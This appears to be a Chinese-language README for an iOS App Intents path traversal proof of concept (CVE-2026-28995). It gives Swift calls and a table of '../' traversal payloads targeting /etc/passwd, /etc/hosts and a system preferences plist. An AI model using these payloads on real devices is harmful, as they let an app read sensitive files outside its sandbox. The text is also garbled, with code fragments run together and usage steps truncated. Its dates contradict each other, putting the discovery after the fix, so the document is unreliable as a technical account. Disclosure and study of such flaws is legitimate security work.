CVE-2026-28995 的概念验证 — iOS 26.4.2 及以下版本中 App Intents 的路径遍历漏洞。
该漏洞允许恶意应用通过 App Intents 读取其沙盒外的任何文件。根本原因是 Apple 的 App Intents 框架中的路径验证不足。
受影响版本: iOS 26.4.2 及以下
修复版本: iOS 26.5(2026年5月11日)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
| 路径 | 读取内容 |
|---|---|
../../../../../../../../../../../../../etc/passwd | 用户密码 |
../../../../../../../../../../../../../etc/hosts | 主机文件 |
../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist | 系统偏好设置 |
如果路径指向目录,函数返回:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
CVE-2026-28995.swift 添加到项目中。readCve(path:)。发现时间: 2026年7月1日
修复版本: iOS 26.5(2026年5月11日)